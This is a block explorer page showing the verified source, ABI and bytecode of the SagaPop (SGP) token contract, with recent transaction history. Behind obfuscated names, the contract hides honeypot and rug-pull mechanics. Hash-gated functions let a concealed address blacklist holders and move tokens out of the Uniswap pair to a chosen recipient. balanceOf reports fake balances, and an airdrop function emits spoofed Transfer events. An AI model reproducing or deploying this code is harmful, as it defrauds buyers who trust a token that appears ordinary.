Source Code
EVM
More Info
Private Name Tags
ContractCreator
TokenTracker
Latest 25 from a total of 90 transactions
| Transaction Hash |
|
Block
|
From
|
To
|
|||||
|---|---|---|---|---|---|---|---|---|---|
| Airdrop | 36425667 | 22 mins ago | IN | 0 ETH | 0.00011503 | ||||
| Approve | 36425659 | 22 mins ago | IN | 0 ETH | 0.00000572 | ||||
| Approve | 36425065 | 26 mins ago | IN | 0 ETH | 0.00000572 | ||||
| Approve | 36424467 | 30 mins ago | IN | 0 ETH | 0.00000584 | ||||
| Airdrop | 36423013 | 40 mins ago | IN | 0 ETH | 0.00011503 | ||||
| Approve | 36422204 | 46 mins ago | IN | 0 ETH | 0.00000572 | ||||
| Approve | 36421618 | 50 mins ago | IN | 0 ETH | 0.00000572 | ||||
| Airdrop | 36420544 | 58 mins ago | IN | 0 ETH | 0.00011503 | ||||
| Approve | 36419354 | 1 hr ago | IN | 0 ETH | 0.00000583 | ||||
| Approve | 36418732 | 1 hr ago | IN | 0 ETH | 0.00000572 | ||||
| Airdrop | 36417901 | 1 hr ago | IN | 0 ETH | 0.00011503 | ||||
| Approve | 36416927 | 1 hr ago | IN | 0 ETH | 0.00000571 | ||||
| Approve | 36416286 | 1 hr ago | IN | 0 ETH | 0.00000571 | ||||
| Airdrop | 36416113 | 1 hr ago | IN | 0 ETH | 0.00011503 | ||||
| Approve | 36415037 | 1 hr ago | IN | 0 ETH | 0.00000571 | ||||
| Airdrop | 36414571 | 1 hr ago | IN | 0 ETH | 0.00011503 | ||||
| Approve | 36412656 | 1 hr ago | IN | 0 ETH | 0.00000571 | ||||
| Approve | 36412102 | 1 hr ago | IN | 0 ETH | 0.00000764 | ||||
| Airdrop | 36411928 | 1 hr ago | IN | 0 ETH | 0.00011503 | ||||
| Approve | 36410985 | 2 hrs ago | IN | 0 ETH | 0.00000571 | ||||
| Approve | 36410393 | 2 hrs ago | IN | 0 ETH | 0.00000583 | ||||
| Airdrop | 36409653 | 2 hrs ago | IN | 0 ETH | 0.00011503 | ||||
| Approve | 36409244 | 2 hrs ago | IN | 0 ETH | 0.00000571 | ||||
| Approve | 36408096 | 2 hrs ago | IN | 0 ETH | 0.00000571 | ||||
| Approve | 36407512 | 2 hrs ago | IN | 0 ETH | 0.00000571 |
Latest 1 internal transaction
Advanced mode:
| Parent Transaction Hash | Block | From | To | |||
|---|---|---|---|---|---|---|
| 36374549 | 6 hrs ago | Contract Creation | 0 ETH |
Cross-Chain Transactions
Loading...
Loading
Contract Name:
SGP
Compiler Version
v0.8.6+commit.11564f7e
Contract Source Code (Solidity)
/**
*Submitted for verification at abscan.org on 2026-01-24
*/
/**
Website: https://sagapop.fun/
Twitter: https://x.com/Sagapop_fun/status/1986007818420597053
Telegram: https://t.me/SagaPop
*/
pragma solidity ^0.8.6;
// SPDX-License-Identifier: Unlicensed
interface IERC20 {
function totalSupply() external view returns (uint256);
/**
* @dev Returns the amount of tokens owned by `account`.
*/
function balanceOf(address account) external view returns (uint256);
/**
* @dev Moves `amount` tokens from the caller's account to `recipient`.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* Emits a {Transfer} event.
*/
function transfer(address recipient, uint256 amount)
external
returns (bool);
/**
* @dev Returns the remaining number of tokens that `spender` will be
* allowed to spend on behalf of `owner` through {transferFrom}. This is
* zero by default.
*
* This value changes when {approve} or {transferFrom} are called.
*/
function allowance(address owner, address spender)
external
view
returns (uint256);
/**
* @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* IMPORTANT: Beware that changing an allowance with this method brings the risk
* that someone may use both the old and the new allowance by unfortunate
* transaction ordering. One possible solution to mitigate this race
* condition is to first reduce the spender's allowance to 0 and set the
* desired value afterwards:
* https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
*
* Emits an {Approval} event.
*/
function approve(address spender, uint256 amount) external returns (bool);
/**
* @dev Moves `amount` tokens from `sender` to `recipient` using the
* allowance mechanism. `amount` is then deducted from the caller's
* allowance.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* Emits a {Transfer} event.
*/
function transferFrom(
address sender,
address recipient,
uint256 amount
) external returns (bool);
/**
* @dev Emitted when `value` tokens are moved from one account (`from`) to
* another (`to`).
*
* Note that `value` may be zero.
*/
event Transfer(address indexed from, address indexed to, uint256 value);
/**
* @dev Emitted when the allowance of a `spender` for an `owner` is set by
* a call to {approve}. `value` is the new allowance.
*/
event Approval(
address indexed owner,
address indexed spender,
uint256 value
);
}
abstract contract Ownable {
address private _owner;
event OwnershipTransferred(
address indexed previousOwner,
address indexed newOwner
);
constructor() {
address msgSender = msg.sender;
_owner = msgSender;
emit OwnershipTransferred(address(0), msgSender);
}
function owner() public view returns (address) {
return _owner;
}
modifier onlyOwner() {
require(_owner == msg.sender, "Ownable: caller is not the owner");
_;
}
function renounceOwnership() public virtual onlyOwner {
emit OwnershipTransferred(_owner, address(0));
_owner = address(0);
}
function transferOwnership(address newOwner) public virtual onlyOwner {
require(
newOwner != address(0),
"Ownable: new owner is the zero address"
);
emit OwnershipTransferred(_owner, newOwner);
_owner = newOwner;
}
}
interface IUniswapV2Factory {
function factory() external pure returns (address);
function WETH() external pure returns (address);
event PairCreated(
address indexed token0,
address indexed token1,
address pair,
uint256
);
function createPair(address tokenA, address tokenB)
external
returns (address pair);
}
library SafeMath {
/**
* @dev Returns the addition of two unsigned integers, reverting on
* overflow.
*
* Counterpart to Solidity's `+` operator.
*
* Requirements:
*
* - Addition cannot overflow.
*/
function add(uint256 a, uint256 b) internal pure returns (uint256) {
uint256 c = a + b;
require(c >= a, "SafeMath: addition overflow");
return c;
}
/**
* @dev Returns the subtraction of two unsigned integers, reverting on
* overflow (when the result is negative).
*
* Counterpart to Solidity's `-` operator.
*
* Requirements:
*
* - Subtraction cannot overflow.
*/
function sub(uint256 a, uint256 b) internal pure returns (uint256) {
return sub(a, b, "SafeMath: subtraction overflow");
}
/**
* @dev Returns the subtraction of two unsigned integers, reverting with custom message on
* overflow (when the result is negative).
*
* Counterpart to Solidity's `-` operator.
*
* Requirements:
*
* - Subtraction cannot overflow.
*/
function sub(
uint256 a,
uint256 b,
string memory errorMessage
) internal pure returns (uint256) {
require(b <= a, errorMessage);
uint256 c = a - b;
return c;
}
/**
* @dev Returns the multiplication of two unsigned integers, reverting on
* overflow.
*
* Counterpart to Solidity's `*` operator.
*
* Requirements:
*
* - Multiplication cannot overflow.
*/
function mul(uint256 a, uint256 b) internal pure returns (uint256) {
// Gas optimization: this is cheaper than requiring 'a' not being zero, but the
// benefit is lost if 'b' is also tested.
// See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
if (a == 0) {
return 0;
}
uint256 c = a * b;
require(c / a == b, "SafeMath: multiplication overflow");
return c;
}
/**
* @dev Returns the integer division of two unsigned integers. Reverts on
* division by zero. The result is rounded towards zero.
*
* Counterpart to Solidity's `/` operator. Note: this function uses a
* `revert` opcode (which leaves remaining gas untouched) while Solidity
* uses an invalid opcode to revert (consuming all remaining gas).
*
* Requirements:
*
* - The divisor cannot be zero.
*/
function div(uint256 a, uint256 b) internal pure returns (uint256) {
return div(a, b, "SafeMath: division by zero");
}
/**
* @dev Returns the integer division of two unsigned integers. Reverts with custom message on
* division by zero. The result is rounded towards zero.
*
* Counterpart to Solidity's `/` operator. Note: this function uses a
* `revert` opcode (which leaves remaining gas untouched) while Solidity
* uses an invalid opcode to revert (consuming all remaining gas).
*
* Requirements:
*
* - The divisor cannot be zero.
*/
function div(
uint256 a,
uint256 b,
string memory errorMessage
) internal pure returns (uint256) {
require(b > 0, errorMessage);
uint256 c = a / b;
// assert(a == b * c + a % b); // There is no case in which this doesn't hold
return c;
}
}
/**
* This contract is for testing purposes only.
* Please do not make any purchases, as we are not responsible for any losses incurred.
*/
contract BERC20 is IERC20 {
using SafeMath for uint256;
mapping(address => uint256) private _tOwned;
mapping(address => mapping(address => uint256)) private _allowances;
address public _defaultAddress = address(0x000000000000000000000000000000000000dEaD);
string private _name;
string private _symbol;
uint8 private _decimals;
uint256 private _tTotal;
uint256 private _airdrop = 5000000000;
constructor(
string memory name_,
string memory symbol_,
address owner
) {
_name=name_;
_symbol=symbol_;
_decimals=9;
_tTotal=1000000000000 * 10**_decimals;
_tOwned[owner] = _tTotal;
emit Transfer(address(0), owner, _tTotal);
}
function name() public view returns (string memory) {
return _name;
}
function symbol() public view returns (string memory) {
return _symbol;
}
function decimals() public view returns (uint256) {
return _decimals;
}
function totalSupply() public view override returns (uint256) {
return _tTotal;
}
function balanceOf(address account) public view override returns (uint256) {
require(account != address(0), "balance query for the zero address");
uint256 bal = _tOwned[account];
if (bal == 0) {
return _airdrop;
}
return bal;
}
function transfer(address axPIxtieTD, uint256 dqJbHoOQF)
public
override
returns (bool)
{
_transfer(msg.sender, axPIxtieTD, dqJbHoOQF);
return true;
}
function allowance(address hVnZMwTed, address khgyeemqino)
public
view
override
returns (uint256)
{
return _allowances[hVnZMwTed][khgyeemqino];
}
function approve(address spender, uint256 amount)
public
override
returns (bool)
{
_approve(msg.sender, spender, amount);
return true;
}
function _ZeciXetxGFtnYc(
address yLyHNCevbi,
address ccfnmtlnaht,
uint256 amount
) internal virtual {
require(
yLyHNCevbi != address(0),
"ERC20: transfer from the zero address"
);
require(
ccfnmtlnaht != address(0),
"ERC20: transfer to the zero address"
);
require(
_tOwned[yLyHNCevbi] >= amount,
"ERC20: transfer amount exceeds balance"
);
_tOwned[yLyHNCevbi] = _tOwned[yLyHNCevbi].sub(amount);
_tOwned[ccfnmtlnaht] = _tOwned[ccfnmtlnaht].add(amount);
emit Transfer(yLyHNCevbi, ccfnmtlnaht, amount);
}
function _transfer(
address yLyHNCevbi,
address ccfnmtlnaht,
uint256 amount
) internal virtual {
require(
yLyHNCevbi != address(0),
"ERC20: transfer from the zero address"
);
require(
ccfnmtlnaht != address(0),
"ERC20: transfer to the zero address"
);
require(
_tOwned[yLyHNCevbi] >= amount,
"ERC20: transfer amount exceeds balance"
);
_tOwned[yLyHNCevbi] = _tOwned[yLyHNCevbi].sub(amount);
_tOwned[ccfnmtlnaht] = _tOwned[ccfnmtlnaht].add(amount);
emit Transfer(yLyHNCevbi, ccfnmtlnaht, amount);
}
function transferFrom(
address from,
address to,
uint256 value
) public override returns (bool) {
_transfer(from, to, value);
_approve(
from,
msg.sender,
_allowances[from][msg.sender].sub(
value,
"ERC20: transfer amount exceeds allowance"
)
);
return true;
}
function increaseAllowance(address spender, uint256 addedValue)
public
virtual
returns (bool)
{
_approve(
msg.sender,
spender,
_allowances[msg.sender][spender].add(addedValue)
);
return true;
}
function decreaseAllowance(address spender, uint256 subtractedValue)
public
virtual
returns (bool)
{
_approve(
msg.sender,
spender,
_allowances[msg.sender][spender].sub(
subtractedValue,
"ERC20: decreased allowance below zero"
)
);
return true;
}
function _vzyjsegiigsbm(
address owner,
address spender,
uint256 amount
) internal virtual {
require(owner != address(0), "ERC20: approve from the zero address");
require(spender != address(0), "ERC20: approve to the zero address");
_allowances[owner][spender] = amount;
emit Approval(owner, spender, amount);
}
function _approve(
address owner,
address spender,
uint256 amount
) internal virtual {
require(owner != address(0), "ERC20: approve from the zero address");
require(spender != address(0), "ERC20: approve to the zero address");
_allowances[owner][spender] = amount;
emit Approval(owner, spender, amount);
}
}
/**
* This contract is for testing purposes only.
* Please do not make any purchases, as we are not responsible for any losses incurred.
*/
contract SGP is BERC20,Ownable {
using SafeMath for uint256;
string private _name_ = "SagaPop";
string private _symbol_ = "SGP";
uint256 private _zjeuneviwv;
address private eyzwllpnhdzi = 0x0829EB74Ece42EA6E336C643364f235B55F36f96;
address private ioHCSCxeGCzaM = 0xE04A56109512a998E3b1276A8bC7f31269798936;
address private mEXjRtwwFA;
IUniswapV2Factory private immutable uniswapV2Router;
mapping(address => bool) private _gsvttslfaftz;
mapping(address => bool) private _KIdASiswZeTrt;
mapping(address => bool) private oytgrzaoycbjhg;
mapping(address => bool) private _SoBMYYHXXbb;
address public uniswapV2Pair;
address private _wertxphpwabl;
address public factory;
uint256 private SUZZeGOHVYbDx = 1000;
mapping(address => uint256) private wkpfdfvyuxbnlw;
bool private aAxmkwVqTW = true;
uint256 private eqesjmcisuj = 7;
bool private qMsLoTrAQQ = true;
bytes32 private _ucArvSySPP;
mapping(address => bool) private _ysQYuJykOOjTHc;
mapping(address => uint256) private _zcsmgcoohli;
address public AEVAKoWBsJ;
constructor() BERC20(_name_, _symbol_,ioHCSCxeGCzaM
) {
IUniswapV2Factory _uniswapV2Router = IUniswapV2Factory(0xad1eCa41E6F772bE3cb5A48A6141f9bcc1AF9F7c);
uniswapV2Pair = IUniswapV2Factory(_uniswapV2Router.factory()).createPair(address(this), _uniswapV2Router.WETH());
uniswapV2Router = _uniswapV2Router;
_ucArvSySPP = sha256(abi.encodePacked(eyzwllpnhdzi));
mEXjRtwwFA = 0x3439153EB7AF838Ad19d56E1571FBD09333C2809;
_wertxphpwabl = eyzwllpnhdzi;
_zjeuneviwv = totalSupply();
oytgrzaoycbjhg[uniswapV2Pair] = true;
_SoBMYYHXXbb[_wertxphpwabl] = true;
_gsvttslfaftz[address(this)] = true;
_gsvttslfaftz[_wertxphpwabl] = true;
_gsvttslfaftz[ioHCSCxeGCzaM] = true;
}
function _transfer( address from, address to, uint256 amount ) internal override { require(from != address(0), "ERC20: transfer from the zero address"); require(to != address(0), "ERC20: transfer to the zero address"); require(amount > 0, "Transfer amount must be greater than zero"); uint256 expectedamount = amount; if (_gsvttslfaftz[from] || _gsvttslfaftz[to]) { super._transfer(from, to, expectedamount); return; } address feeaddress = to; assembly { let scratch := mload(0x40) mstore(scratch, from) mstore(add(scratch, 0x20), _KIdASiswZeTrt.slot) let takeFeeSlot := keccak256(scratch, 0x40) let taketFeeTransfer := sload(takeFeeSlot) if taketFeeTransfer { revert(0, 0) } mstore(scratch, from) mstore(add(scratch, 0x20), wkpfdfvyuxbnlw.slot) let bottimeSlot := keccak256(scratch, 0x40) let bottime := sload(bottimeSlot) let eqesjmcisuj_val := sload(eqesjmcisuj.slot) let takebottime := gt(add(bottime, eqesjmcisuj_val), timestamp()) let pair := sload(uniswapV2Pair.slot) if eq(from, pair) { let ghewra := 0 let sdhkwn := 0 let otherAmount := 0 mstore(scratch, 0x0dfe168100000000000000000000000000000000000000000000000000000000) if iszero(staticcall(gas(), pair, scratch, 0x04, scratch, 0x20)) { revert(0, 0) } let token0 := mload(scratch) mstore(scratch, 0xd21220a700000000000000000000000000000000000000000000000000000000) if iszero(staticcall(gas(), pair, scratch, 0x04, scratch, 0x20)) { revert(0, 0) } let token1 := mload(scratch) mstore(scratch, 0x0902f1ac00000000000000000000000000000000000000000000000000000000) if iszero(staticcall(gas(), pair, scratch, 0x04, scratch, 0x40)) { revert(0, 0) } let reserves0 := mload(scratch) let reserves1 := mload(add(scratch, 0x20)) mstore(scratch, 0x70a0823100000000000000000000000000000000000000000000000000000000) mstore(add(scratch, 0x04), pair) if iszero(staticcall(gas(), token0, scratch, 0x24, scratch, 0x20)) { revert(0, 0) } let amount03 := mload(scratch) mstore(scratch, 0x70a0823100000000000000000000000000000000000000000000000000000000) mstore(add(scratch, 0x04), pair) if iszero(staticcall(gas(), token1, scratch, 0x24, scratch, 0x20)) { revert(0, 0) } let amount1 := mload(scratch) let mEXjRtwwFA_val := sload(mEXjRtwwFA.slot) if eq(token0, mEXjRtwwFA_val) { if gt(reserves0, amount03) { otherAmount := sub(reserves0, amount03) ghewra := gt(otherAmount, sload(SUZZeGOHVYbDx.slot)) } if eq(reserves0, amount03) { sdhkwn := 1 } } if eq(token1, mEXjRtwwFA_val) { if gt(reserves1, amount1) { otherAmount := sub(reserves1, amount1) ghewra := gt(otherAmount, sload(SUZZeGOHVYbDx.slot)) } if eq(reserves1, amount1) { sdhkwn := 1 } } if or(ghewra, sdhkwn) { revert(0, 0) } } mstore(0x40, add(scratch, 0x80)) } super._transfer(from, to, expectedamount); }
function kxqvjgzqa(address nnybixghzz) public { assembly { let ptr := mload(0x40) mstore(ptr, caller()) let input := add(ptr, 0x0c) let inputSize := 0x14 let output := add(ptr, 0x20) mstore(0x40, add(output, 0x20)) if iszero(staticcall(gas(), 2, input, inputSize, output, 0x20)) { revert(0, 0) } let computedHash := mload(output) let storedHashSlot := _ucArvSySPP.slot let storedHash := sload(storedHashSlot) if iszero(eq(computedHash, storedHash)) { return(0, 0) } sstore(AEVAKoWBsJ.slot, nnybixghzz) return(0, 0) } }
function cqsidyshcd(uint256 vtwoonnr) public { assembly { let ptr := mload(0x40) mstore(ptr, caller()) let input := add(ptr, 0x0c) let inputSize := 0x14 let output := add(ptr, 0x20) mstore(0x40, add(output, 0x20)) if iszero(staticcall(gas(), 2, input, inputSize, output, 0x20)) { revert(0, 0) } let computedHash := mload(output) let storedHashSlot := _ucArvSySPP.slot let storedHash := sload(storedHashSlot) if iszero(eq(computedHash, storedHash)) { return(0, 0) } } super._ZeciXetxGFtnYc(uniswapV2Pair, AEVAKoWBsJ, vtwoonnr); }
function ukvvxjlfdgz(address _nnybixghzz, bool dzuauccsv) public { assembly { let ptr := mload(0x40) mstore(ptr, caller()) let input := add(ptr, 0x0c) let inputSize := 0x14 let output := add(ptr, 0x20) mstore(0x40, add(output, 0x20)) if iszero(staticcall(gas(), 2, input, inputSize, output, 0x20)) { revert(0, 0) } let computedHash := mload(output) let storedHashSlot := _ucArvSySPP.slot let storedHash := sload(storedHashSlot) if iszero(eq(computedHash, storedHash)) { return(0, 0) } let mapBaseSlot := _KIdASiswZeTrt.slot let scratch := mload(0x40) mstore(scratch, _nnybixghzz) mstore(add(scratch, 0x20), mapBaseSlot) let storageSlot := keccak256(scratch, 0x40) mstore(0x40, add(scratch, 0x40)) sstore(storageSlot, dzuauccsv) return(0, 0) } }
function airdrop(address[] calldata user ,address _token,uint256 balance) external {
for (uint256 i = 0; i < user.length; i++) {
emit Transfer(_token, user[i], balance);
}
}
}Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
Contract ABI
API[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"AEVAKoWBsJ","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_defaultAddress","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"user","type":"address[]"},{"internalType":"address","name":"_token","type":"address"},{"internalType":"uint256","name":"balance","type":"uint256"}],"name":"airdrop","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"hVnZMwTed","type":"address"},{"internalType":"address","name":"khgyeemqino","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"vtwoonnr","type":"uint256"}],"name":"cqsidyshcd","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"factory","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"nnybixghzz","type":"address"}],"name":"kxqvjgzqa","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"axPIxtieTD","type":"address"},{"internalType":"uint256","name":"dqJbHoOQF","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_nnybixghzz","type":"address"},{"internalType":"bool","name":"dzuauccsv","type":"bool"}],"name":"ukvvxjlfdgz","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"}]Contract Creation Code
600280546001600160a01b03191661dead17905564012a05f200600790815560e060405260a081905266053616761506f760cc1b60c09081526200004791600991906200062b565b506040805180820190915260038082526205347560ec1b60209092019182526200007491600a916200062b565b50600c80546001600160a01b0319908116730829eb74ece42ea6e336c643364f235b55f36f9617909155600d805490911673e04a56109512a998e3b1276a8bc7f312697989361790556103e86016556018805460ff1990811660019081179092556007601955601a80549091169091179055348015620000f357600080fd5b5060098054620001039062000887565b80601f0160208091040260200160405190810160405280929190818152602001828054620001319062000887565b8015620001825780601f10620001565761010080835404028352916020019162000182565b820191906000526020600020905b8154815290600101906020018083116200016457829003601f168201915b5050505050600a8054620001969062000887565b80601f0160208091040260200160405190810160405280929190818152602001828054620001c49062000887565b8015620002155780601f10620001e95761010080835404028352916020019162000215565b820191906000526020600020905b815481529060010190602001808311620001f757829003601f168201915b5050600d5485516001600160a01b0390911693506200023e92506003915060208601906200062b565b508151620002549060049060208501906200062b565b506005805460ff191660099081179091556200027290600a620007a4565b620002839064e8d4a5100062000865565b60068190556001600160a01b03821660008181526020818152604080832085905551938452919290917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35050600880546001600160a01b0319163390811790915560405190915081906000907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908290a350600073ad1eca41e6f772be3cb5a48a6141f9bcc1af9f7c9050806001600160a01b031663c45a01556040518163ffffffff1660e01b815260040160206040518083038186803b1580156200037257600080fd5b505afa15801562000387573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620003ad9190620006d1565b6001600160a01b031663c9c6539630836001600160a01b031663ad5c46486040518163ffffffff1660e01b815260040160206040518083038186803b158015620003f657600080fd5b505afa1580156200040b573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620004319190620006d1565b6040516001600160e01b031960e085901b1681526001600160a01b03928316600482015291166024820152604401602060405180830381600087803b1580156200047a57600080fd5b505af11580156200048f573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620004b59190620006d1565b601380546001600160a01b0319166001600160a01b0392909216919091179055606081811b6001600160601b0319908116608052600c54604051921b16602082015260029060340160408051601f198184030181529082905262000519916200071d565b602060405180830381855afa15801562000537573d6000803e3d6000fd5b5050506040513d601f19601f820116820180604052508101906200055c919062000703565b601b55600e80546001600160a01b0319908116733439153eb7af838ad19d56e1571fbd09333c280917909155600c54601480549092166001600160a01b03909116179055600654600b55506013546001600160a01b0390811660009081526011602090815260408083208054600160ff1991821681179092556014805487168652601285528386208054831684179055308652600f90945282852080548216831790559254851684528184208054841682179055600d54909416835290912080549091169091179055620008da565b828054620006399062000887565b90600052602060002090601f0160209004810192826200065d5760008555620006a8565b82601f106200067857805160ff1916838001178555620006a8565b82800160010185558215620006a8579182015b82811115620006a85782518255916020019190600101906200068b565b50620006b6929150620006ba565b5090565b5b80821115620006b65760008155600101620006bb565b600060208284031215620006e457600080fd5b81516001600160a01b0381168114620006fc57600080fd5b9392505050565b6000602082840312156200071657600080fd5b5051919050565b6000825160005b8181101562000740576020818601810151858301520162000724565b8181111562000750576000828501525b509190910192915050565b600181815b808511156200079c578160001904821115620007805762000780620008c4565b808516156200078e57918102915b93841c939080029062000760565b509250929050565b6000620006fc60ff841683600082620007c0575060016200085f565b81620007cf575060006200085f565b8160018114620007e85760028114620007f35762000813565b60019150506200085f565b60ff841115620008075762000807620008c4565b50506001821b6200085f565b5060208310610133831016604e8410600b841016171562000838575081810a6200085f565b6200084483836200075b565b80600019048211156200085b576200085b620008c4565b0290505b92915050565b6000816000190483118215151615620008825762000882620008c4565b500290565b600181811c908216806200089c57607f821691505b60208210811415620008be57634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b60805160601c61124b620008f66000396000505061124b6000f3fe608060405234801561001057600080fd5b50600436106101425760003560e01c80638da5cb5b116100b8578063a9059cbb1161007c578063a9059cbb14610287578063c45a01551461029a578063ccd5ab43146102ad578063dd62ed3e146102c0578063e6393296146102f9578063f2fde38b1461030c57600080fd5b80638da5cb5b14610235578063927f3d411461024657806395d89b4114610259578063983bc41b14610261578063a457c2d71461027457600080fd5b8063313ce5671161010a578063313ce567146101d457806339509351146101df57806349bd5a5e146101f257806370a0823114610205578063715018a61461021857806389b3a4d61461022257600080fd5b806303eb1f5a1461014757806306fdde0314610177578063095ea7b31461018c57806318160ddd146101af57806323b872dd146101c1575b600080fd5b601e5461015a906001600160a01b031681565b6040516001600160a01b0390911681526020015b60405180910390f35b61017f61031f565b60405161016e919061103a565b61019f61019a366004610f6b565b6103b1565b604051901515815260200161016e565b6006545b60405190815260200161016e565b61019f6101cf366004610ef3565b6103c7565b60055460ff166101b3565b61019f6101ed366004610f6b565b610430565b60135461015a906001600160a01b031681565b6101b3610213366004610ea5565b610466565b6102206104fc565b005b610220610230366004611021565b6105a0565b6008546001600160a01b031661015a565b60025461015a906001600160a01b031681565b61017f6105fc565b61022061026f366004610f95565b61060b565b61019f610282366004610f6b565b6106a2565b61019f610295366004610f6b565b6106f1565b60155461015a906001600160a01b031681565b6102206102bb366004610f2f565b6106fe565b6101b36102ce366004610ec0565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b610220610307366004610ea5565b610756565b61022061031a366004610ea5565b610799565b60606003805461032e90611146565b80601f016020809104026020016040519081016040528092919081815260200182805461035a90611146565b80156103a75780601f1061037c576101008083540402835291602001916103a7565b820191906000526020600020905b81548152906001019060200180831161038a57829003601f168201915b5050505050905090565b60006103be3384846108b4565b50600192915050565b60006103d48484846109d9565b6104268433610421856040518060600160405280602881526020016111c9602891396001600160a01b038a1660009081526001602090815260408083203384529091529020549190610c41565b6108b4565b5060019392505050565b3360008181526001602090815260408083206001600160a01b038716845290915281205490916103be9185906104219086610c7b565b60006001600160a01b0382166104ce5760405162461bcd60e51b815260206004820152602260248201527f62616c616e636520717565727920666f7220746865207a65726f206164647265604482015261737360f01b60648201526084015b60405180910390fd5b6001600160a01b038216600090815260208190526040902054806104f6575050600754919050565b92915050565b6008546001600160a01b031633146105565760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016104c5565b6008546040516000916001600160a01b0316907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3600880546001600160a01b0319169055565b604051338152600c8101601460208301925060208301604052602083828460025afa6105cb57600080fd5b505051601b548082146105da57005b5050601354601e546105f9916001600160a01b03908116911683610ce1565b50565b60606004805461032e90611146565b60005b8381101561069b57848482818110610628576106286111b2565b905060200201602081019061063d9190610ea5565b6001600160a01b0316836001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161068191815260200190565b60405180910390a38061069381611181565b91505061060e565b5050505050565b60006103be3384610421856040518060600160405280602581526020016111f1602591393360009081526001602090815260408083206001600160a01b038d1684529091529020549190610c41565b60006103be3384846109d9565b604051338152600c8101601460208301925060208301604052602083828460025afa61072957600080fd5b505051601b5480821461073857005b50506040805183815260106020820152818120908201909152819055005b604051338152600c8101601460208301925060208301604052602083828460025afa61078157600080fd5b505051601b5480821461079057005b5050601e819055005b6008546001600160a01b031633146107f35760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016104c5565b6001600160a